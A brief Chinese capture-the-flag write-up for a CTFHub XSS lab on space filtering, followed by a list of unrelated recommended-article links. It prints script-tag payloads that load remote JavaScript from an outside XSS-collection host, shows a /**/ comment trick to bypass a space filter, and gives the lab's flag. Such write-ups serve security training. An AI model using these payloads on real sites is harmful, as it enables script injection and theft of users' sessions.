CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
m0_5287238114 分钟前
HTML中,title和h1标签的区别是什么?
前端·html
Dark_programmer14 分钟前
html - - - - - modal弹窗出现时,页面怎么能限制滚动
前端·html
二十雨辰15 分钟前
[Java基础]网络编程
java·开发语言
ACGkaka_19 分钟前
抓包工具(三)Wireshark代理抓包Java程序的HTTPS请求
java·https·wireshark
GDAL20 分钟前
HTML Canvas clip 深入全面讲解
前端·javascript·canvas
禾苗种树21 分钟前
在 Vue 3 中使用 ECharts 制作多 Y 轴折线图时,若希望 **Y 轴颜色自动匹配折线颜色**且无需手动干预,可以通过以下步骤实现:
前端·vue.js·echarts
Struggle Sheep34 分钟前
容器化部署tomcat
java·tomcat
贵州数擎科技有限公司42 分钟前
使用 Three.js 实现流光特效
前端·webgl
JustHappy44 分钟前
「我们一起做组件库🌻」做个面包屑🥖,Vue的依赖注入实战💉(VersakitUI开发实录)
前端·javascript·github
M1A11 小时前
Python语言发展史:从创立到成为全球热门
java